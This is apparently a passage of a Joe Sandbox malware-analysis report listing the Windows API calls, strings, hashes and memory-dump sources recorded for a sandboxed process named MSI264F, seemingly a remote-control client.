                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$RectText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4034337308-0
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,75BF73E0,?,00B00C46,?,00B09820,?,00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00BA5
                                                                                                                        • GetVersion.KERNEL32(?,00B00C46,?,00B09820,?,00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00BC0
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00B00C46,?,00B09820,?,00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00BD7
                                                                                                                        • ExitProcess.KERNEL32 ref: 00B00C19
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$ExitProcessVersion
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3002118274-0
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 00B04276
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B04283
                                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00B04292
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?), ref: 00B042AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MoveParentPointsRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 868478971-0
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32(02771C40,00B5FE6A,?,00000000,?,00B601A1,00000000,00B83950,0000000C,00B5B82D,?,00000000,?), ref: 00B4A6B0
                                                                                                                        • __malloc_crt.LIBCMT ref: 00B4A6DF
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B4A6EC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 237123855-0
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B0B08E
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00B8C2FC,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B098
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B0B8
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B0CC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2905768538-0
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00002328,?,?,00AE3B1B), ref: 00AFC643
                                                                                                                        • SetEvent.KERNEL32(?,?,?,00AE3B1B), ref: 00AFC649
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00002710,?,?,00AE3B1B), ref: 00AFC658
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00AE3B1B), ref: 00AFC65E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSingleWait$CloseEventHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1408678129-0
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF4695
                                                                                                                        • _memmove.LIBCMT ref: 00AF46E6
                                                                                                                          • Part of subcall function 00AF3770: std::_Xinvalid_argument.LIBCPMT ref: 00AF378A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 2168136238-2556327735
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 256744135-2556327735
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00AE99A0: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE99C2
                                                                                                                          • Part of subcall function 00AE99A0: LoadLibraryW.KERNEL32(?), ref: 00AE9A06
                                                                                                                          • Part of subcall function 00AE99A0: GetProcAddress.KERNEL32(?,WdfPreDeviceInstall), ref: 00AE9A20
                                                                                                                          • Part of subcall function 00AE99A0: GetProcAddress.KERNEL32(00000000,WdfPostDeviceInstall), ref: 00AE9A2D
                                                                                                                          • Part of subcall function 00AE99A0: GetProcAddress.KERNEL32(?,WdfPreDeviceRemove), ref: 00AE9A3A
                                                                                                                          • Part of subcall function 00AE99A0: GetProcAddress.KERNEL32(?,WdfPostDeviceRemove), ref: 00AE9A47
                                                                                                                          • Part of subcall function 00AE99A0: FreeLibrary.KERNEL32(00000000,?,WdfPostDeviceRemove,?,WdfPreDeviceRemove,?,WdfPreDeviceInstall), ref: 00AE9A69
                                                                                                                          • Part of subcall function 00AE9BE0: wvsprintfW.USER32(?,?,?), ref: 00AE9C0B
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00AEB1B7
                                                                                                                        Strings
                                                                                                                        • Error. predeviceInstall failed, e=%d, xrefs: 00AEB180
                                                                                                                        • Error loading wdfCoInstaller, xrefs: 00AEB147
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: AddressProc$Library$CloseCurrentDirectoryFreeHandleLoadServicewvsprintf
                                                                                                                        • String ID: Error loading wdfCoInstaller$Error. predeviceInstall failed, e=%d
                                                                                                                        • API String ID: 266337823-2211093675
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF340B
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF3429
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 963545896-2556327735
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2927
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00AF2971
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 1785806476-2556327735
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2AA4
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00AF2AEB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 1785806476-2556327735
                                                                                                                        APIs
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B18DD7
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B18E1E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 2034136378-336475711
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00AE22A8
                                                                                                                          • Part of subcall function 00AE20B0: __alloca_probe_16.LIBCMT ref: 00AE20E8
                                                                                                                          • Part of subcall function 00AE20B0: WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 00AE2117
                                                                                                                          • Part of subcall function 00AE20B0: _fputs.LIBCMT ref: 00AE2122
                                                                                                                          • Part of subcall function 00AE20B0: _fputc.LIBCMT ref: 00AE212A
                                                                                                                          • Part of subcall function 00AE2010: _memset.LIBCMT ref: 00AE2036
                                                                                                                          • Part of subcall function 00AE2010: _wcsncpy.LIBCMT ref: 00AE205E
                                                                                                                          • Part of subcall function 00AE2010: wsprintfW.USER32 ref: 00AE2082
                                                                                                                        • wsprintfW.USER32 ref: 00AE2302
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memsetwsprintf$ByteCharMultiWide__alloca_probe_16_fputc_fputs_wcsncpy
                                                                                                                        • String ID: _present=1%c
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: .EXE$.exe
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsncpy
                                                                                                                        • String ID: ..\CTL32\util.cpp$p || !"<2Kb mem"
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(00020019,?,00000000,5E06C67B,00000000,00020019,?,00000000), ref: 00B04A70
                                                                                                                          • Part of subcall function 00B04640: wvsprintfW.USER32(?,?,?), ref: 00B0466B
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValuewvsprintf
                                                                                                                        • String ID: ($Error %d getting %s
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF12C6
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • _memmove.LIBCMT ref: 00AF1304
                                                                                                                        Strings
                                                                                                                        • invalid string position, xrefs: 00AF12C1
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: invalid string position
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00B1C78A
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B1C7C6
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileLibraryLoadModuleName
                                                                                                                        • String ID: NSMTrace.dll
                                                                                                                        APIs
                                                                                                                        • __itow.LIBCMT ref: 00B04EF2
                                                                                                                          • Part of subcall function 00B3A0C7: _xtow@16.LIBCMT ref: 00B3A0E7
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 00B04F20
                                                                                                                        Strings
                                                                                                                        • Error %d setting %s to %s, xrefs: 00B04F32
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Value__itow_xtow@16
                                                                                                                        • String ID: Error %d setting %s to %s
                                                                                                                        APIs
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AE2D25
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,-00000001,00B699F4,?), ref: 00AE2D45
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__alloca_probe_16
                                                                                                                        • String ID: [%s]%s=%s
                                                                                                                        • API String ID: 3688305362-3085917964
                                                                                                                        • Opcode ID: 1997bd6385ada8ab189f591a8e80ad0d8f20ce41001e6247de770c6af12792fc
                                                                                                                        • Instruction ID: 6e6efea0f78a2856a782cf5bc8d1057c8344f496764ffb9cc923ae7f5cc71900
                                                                                                                        • Opcode Fuzzy Hash: 1997bd6385ada8ab189f591a8e80ad0d8f20ce41001e6247de770c6af12792fc
                                                                                                                        • Instruction Fuzzy Hash: CE118275600108AFDB10EF98DC56FEF77B8EB85710F104298FD1597391EAB4AA05CB92
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00AFE4E5
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00AFE511
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$Query
                                                                                                                        • String ID: %s=%x, e=%d
                                                                                                                        • API String ID: 4255345937-60135172
                                                                                                                        • Opcode ID: 7adaed93989ff42bd5fe30242110254dc4d08068507c5e431611bd7978a95f91
                                                                                                                        • Instruction ID: 8496b060de865afa2a3d8b607e424f9a31f6375e40923b63fc471581faf4556f
                                                                                                                        • Opcode Fuzzy Hash: 7adaed93989ff42bd5fe30242110254dc4d08068507c5e431611bd7978a95f91
                                                                                                                        • Instruction Fuzzy Hash: 68015272A11219BBDB20DF95DC09FEB77BCEB85B14F004196FA1497140E6B0AA1587A1
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF29E5
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00AF2A14
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: vector<T> too long
                                                                                                                        • API String ID: 1785806476-3788999226
                                                                                                                        • Opcode ID: fa138cdbea518ca1347cca2d77860bf1124a2ab82fd8013ac2e0aa7909d0a970
                                                                                                                        • Instruction ID: 18e674be4761bc36c63f1f191fdf4597fedb70e46593d7b1d512d8d19a1637c2
                                                                                                                        • Opcode Fuzzy Hash: fa138cdbea518ca1347cca2d77860bf1124a2ab82fd8013ac2e0aa7909d0a970
                                                                                                                        • Instruction Fuzzy Hash: C90192B26002059FC734DFA9DC81C67B7E9EB947507188A2DF55A87654EA30F900CBA0
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 00AE42F8
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • _free.LIBCMT ref: 00AE4345
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                        • String ID: ..\CTL32\Config.cpp
                                                                                                                        • API String ID: 1020059152-24132961
                                                                                                                        • Opcode ID: 186f3566b1f50ed0459ed2df3619ad3cb03f371fb5b70139583171e8da25e79b
                                                                                                                        • Instruction ID: a87cad48b4e41414b24777d17576e433b90cc98fd4f802a93c3aa4a20fc08453
                                                                                                                        • Opcode Fuzzy Hash: 186f3566b1f50ed0459ed2df3619ad3cb03f371fb5b70139583171e8da25e79b
                                                                                                                        • Instruction Fuzzy Hash: E8018BB660510A6B9B10EE68DC82CAB73DDEF88360B154165F908D7342EA71ED2187B1
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00B33215
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00B33240
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: vector<T> too long
                                                                                                                        • API String ID: 1785806476-3788999226
                                                                                                                        • Opcode ID: 53767d2839fe8c26550ba4855caab9652e8e91455f81ff82d01b34d3d5a77efa
                                                                                                                        • Instruction ID: bbaa4c869c75384ec7e9c91e3f6ca2fce9963db357779f33232a4d81529fecc4
                                                                                                                        • Opcode Fuzzy Hash: 53767d2839fe8c26550ba4855caab9652e8e91455f81ff82d01b34d3d5a77efa
                                                                                                                        • Instruction Fuzzy Hash: 6A01B1B26002059FCB20DEADCC81C6BB7E9EF847107248A6DF89683655DA30F900CBA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoMonitor_memset
                                                                                                                        • String ID: h
                                                                                                                        • API String ID: 741975714-2439710439
                                                                                                                        • Opcode ID: d7dd769d44e20b6d8583e1a63dd65002c04c5ccdee06ede0a9f5fbd184b284cd
                                                                                                                        • Instruction ID: c43ade6284f1a726ba03644fce016c473cdd345178d5796b1c9475f4a372a2bc
                                                                                                                        • Opcode Fuzzy Hash: d7dd769d44e20b6d8583e1a63dd65002c04c5ccdee06ede0a9f5fbd184b284cd
                                                                                                                        • Instruction Fuzzy Hash: EA111874E003089BCB14CF99D845A9EF7F9FF88710F10851DE85AAB390DB70A905CB81
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
